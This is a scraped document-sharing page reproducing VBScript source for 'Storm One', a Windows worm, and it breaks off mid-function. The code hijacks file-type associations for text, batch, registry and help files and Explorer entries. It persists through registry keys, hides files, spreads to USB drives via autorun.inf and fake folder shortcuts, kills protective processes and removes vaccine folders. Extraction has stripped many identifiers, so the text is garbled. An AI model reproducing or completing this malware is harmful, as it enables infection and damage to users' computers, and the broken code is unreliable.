暴风一号源码.docx
《暴风一号源码.docx》由会员分享,可在线阅读,更多相关《暴风一号源码.docx(18页珍藏版)》请在冰豆网上搜索。
暴风一号源码
onerrorresumenext
dimfso,wshshell
setfso=createobject("")
setwshshell=createobject("")
callmain()
submain()
onerrorresumenext
dimargs,virusload,virusass
setargs=
virusload=getmainvirus
(1)
virusass=getmainvirus(0)
argnum=0
dowhileargnum<
param=param&""&args(argnum)
argnum=argnum+1
loop
subparam=lcase(right(param,3))
selectcasesubparam
case"run"
runpath=left,2)
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"txt","log","ini","inf"
runpath="%systemroot%\system32\"¶m
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"bat","cmd"
runpath="cmd/cechohi!
i'mhere!
&pause"
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"reg"
runpath=""&""""&trim(param)&""""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"chm"
runpath=""&""""&trim(param)&""""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"hlp"
runpath=""&""""&trim(param)&""""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"dir"
runpath=""""&left(trim(param),len(trim(param))-3)&""""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"oie"
runpath="""%programfiles%\internetexplorer\"""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"omc"
runpath="/n,:
:
{20d04fe0-3aea-1069-a2d8-08002b30309d}"
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"emc"
runpath="/n,/e,:
:
{20d04fe0-3aea-1069-a2d8-08002b30309d}"
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
caseelse
ifpredblinstance=truethen
endif
timeout=datediff("ww",getinfecteddate,date)-12
iftimeout>0andmonth(date)=day(date)then
callvirusalert()
callmakejoke(cint(month(date)))
endif
callmonitorsystem()
endselect
endsub
submonitorsystem()
onerrorresumenext:
dimprocessnames,exefullnames
processnames=array("","","","","","","")
vbsfullnames=array(getmainvirus
(1))
do
callkillprocess(processnames)
callinvadesystem(getmainvirus
(1),getmainvirus(0))
callkeepprocess(vbsfullnames)
3000
loop
endsub
subinvadesystem(virusloadpath,virusasspath)
onerrorresumenext
dimload_value,file_value,ie_value,mycpt_value1,mycpt_value2,hcuload,hcuver,viruscode,version
load_value=""""&virusloadpath&""""
file_value="%systemroot%\system32\"&""""&virusasspath&""""&"%1%*"
ie_value="%systemroot%\system32\"&""""&virusasspath&""""&"oie"
mycpt_value1="%systemroot%\system32\"&""""&virusasspath&""""&"omc"
mycpt_value2="%systemroot%\system32\"&""""&virusasspath&""""&"emc"
hcuload="hkey_current_user\software\microsoft\windowsnt\currentversion\windows\load"
hcuver="hkey_current_user\software\microsoft\windowsnt\currentversion\windows\ver"
hcudate="hkey_current_user\software\microsoft\windowsnt\currentversion\windows\date"
viruscode=getcode
version=1
hostsourcepath=
(1)&"\"
hostfilepath=(0)&"\system\"
foreachdrivein
ifand=1or=2or=3)then
diskvirusname=getserialnumber&".vbs"
callcreateautorun,diskvirusname)
callinfectroot,diskvirusname)
endif
next
if(virusasspath)=falseor(virusloadpath)=falseor(hostfilepath)=falseorgetversion()ifgetfilesystemtype(getsystemdrive())="ntfs"then
callcreatefile(viruscode,virusasspath)
callcreatefile(viruscode,virusloadpath)
callcopyfile(hostsourcepath,hostfilepath)
callsethiddenattr(hostfilepath)
else
callcreatefile(viruscode,virusasspath)
callsethiddenattr(virusasspath)
callcreatefile(viruscode,virusloadpath)
callsethiddenattr(virusloadpath)
callcopyfile(hostsourcepath,hostfilepath)
callsethiddenattr(hostfilepath)
endif
endif
ifreadreg(hcuload)<>load_valuethen
callwritereg(hcuload,load_value,"")
endif
ifgetversion()callwritereg(hcuver,version,"")
endif
ifgetinfecteddate()=""then
callwritereg(hcudate,date,"")
endif
ifreadreg("hkey_local_machine\software\classes\txtfile\shell\open\command\")<>file_valuethen
callsettxtfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\inifile\shell\open\command\")<>file_valuethen
callsetinifileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\inffile\shell\open\command\")<>file_valuethen
callsetinffileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\batfile\shell\open\command\")<>file_valuethen
callsetbatfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\cmdfile\shell\open\command\")<>file_valuethen
callsetcmdfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\regfile\shell\open\command\")<>file_valuethen
callsetregfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\\shell\open\command\")<>file_valuethen
callsetchmfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\hlpfile\shell\open\command\")<>file_valuethen
callsethlpfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\applications\\shell\open\command\")<>ie_valuethen
callsetieass(virusasspath)
endif
ifreadreg("hkey_classes_root\clsid\{871c5380-42a0-1069-a2ea-08002b30309d}\shell\openhomepage\command\")<>ie_valuethen
callsetieass(virusasspath)
endif
ifreadreg("hkey_classes_root\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}\shell\open\command\")<>mycpt_value1then
allsetmycomputerass(virusasspath)
endif
ifreadreg("hkey_classes_root\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}\shell\explore\command\")<>mycpt_value2then
callsetmycomputerass(virusasspath)
endif
callregset()
endsub
subcopyfile(source,pathf)
onerrorresumenext
if(pathf)then
pathf,true
endif
source,pathf
endsub
subcreatefile(code,pathf)
onerrorresumenext
dimfiletext
if(pathf)then
setfiletext=(pathf,2,false)
code
else
setfiletext=(pathf,2,true)
code
endif
endsub
subcreatefile(code,pathf)
onerrorresumenext
dimfiletext
if(pathf)then
setfiletext=(pathf,2,false)
code
else
setfiletext=(pathf,2,true)
code
endif
endsub
subregset()
onerrorresumenext
dimregpath1,regpath2,regpath3,regpath4
regpath1="hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\nohidden\checkedvalue"
regpath2="hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue"
regpath3="hkey_current_user\software\microsoft\windows\currentversion\policies\explorer\nodrivetypeautorun"
regpath4="hkey_classes_root\lnkfile\isshortcut"
callwritereg(regpath1,3,"reg_dword")
callwritereg(regpath2,2,"reg_dword")
callwritereg(regpath3,0,"reg_dword")
calldeletereg(regpath4)
endsub
subkillprocess(processnames)
onerrorresumenext
setwmiservice=getobject("winmgmts:
\\.\root\cimv2")
foreachprocessnameinprocessnames
setprocesslist=("select*fromwin32_processwherename='"&processname&"'")
foreachprocessinprocesslist
intreturn=
ifintreturn<>0then
"cmd/cntsd-cq-p"&,vbhide,false
endif
next
next
endsub
subkillimmunity(d)
onerrorresumenext
immunityfolder=d&":
\"
if(immunityfolder)then
("cmd/ccacls"&""""&immunityfolder&""""&"/t/e/c/geveryone:
f"),vbhide,true
("cmd/crd/s/q"&immunityfolder),vbhide,true
endif
endsub
subkeepprocess(vbsfullnames)
onerrorresumenext
foreachvbsfullnameinvbsfullnames
ifvbsprocesscount(vbsfullname)<2then
run("%systemroot%\system\"&vbsfullname)
endif
next
endsub
subwritereg(strkey,value,vtype)
dimtmps
settmps=createobject("")
ifvtype=""then
strkey,value
else
strkey,value,vtype
endif
settmps=nothing
endsub
subdeletereg(strkey)
dimtmps
settmps=createobject("")
strkey
settmps=nothing
endsub
subsethiddenattr(path)
onerrorresumenext
dimvf
setvf=(path)
setvf=(path)
=6
endsub
subrun(exefullname)
onerrorresumenext
dimwshshell
setwshshell=("")
exefullname
setwshshell=nothing
endsub
subinfectroot(d,virusname)
onerrorresumenext
dimvbscode
vbscode=getcode
vbspath=d&":
\"&virusname
if(vbspath)=falsethen
callcreatefile(vbscode,vbspath)
callsethiddenattr(vbspath)
endif
setfolder=(d&":
\")
setsubfolders=
foreachsubfolderinsubfolders
sethiddenattr
lnkpath=d&":
\"&&".lnk"
targetpath=d&":
\"&virusname
args=""""&d&":
\"&&"\dir"""
if(lnkpath)=falseorgettargetpath(lnkpath)<>targetpaththen
if(lnkpath)=truethen
lnkpath,true
endif
callcreateshortcut(lnkpath,targetpath,args)
endif
next
endsub
subcreateshortcut(lnkpath,targetpath,args)
setshortcut=(lnkpath)
withshortcut
.targetpath=targetpath
.arguments=args
.windowstyle=4
.iconlocation="%systemroot%\system32\,3"
.save
endwith
endsub
subcreateautorun(d,virusname)
onerrorresumenext
diminfpath,vbspath,vbscode
infpath=d&":
\"
vbspath=d&":
\"&virusname
vbscode=getcode
if(infpath)=falseor(vbspath)=falsethen
callcreatefile(vbscode,vbspath)
callsethiddenattr(vbspath)
strinf="[autorun]"&vbcrlf&"shellexecute="&virusname&"""autorun"""&vbcrlf&"shell\open=′ò?
a(&o)"&vbcrlf&"shell\open\command="&virusname&"""autorun"""&vbcrlf&"shell\open\default=1"&vbcrlf&"shell\explore=×ê?
′1üàí?
÷(&x)"&vbcrlf&"shell\explore\command="&virusname&"""autorun"""
callkillimmunity(d)
callcreatefile(s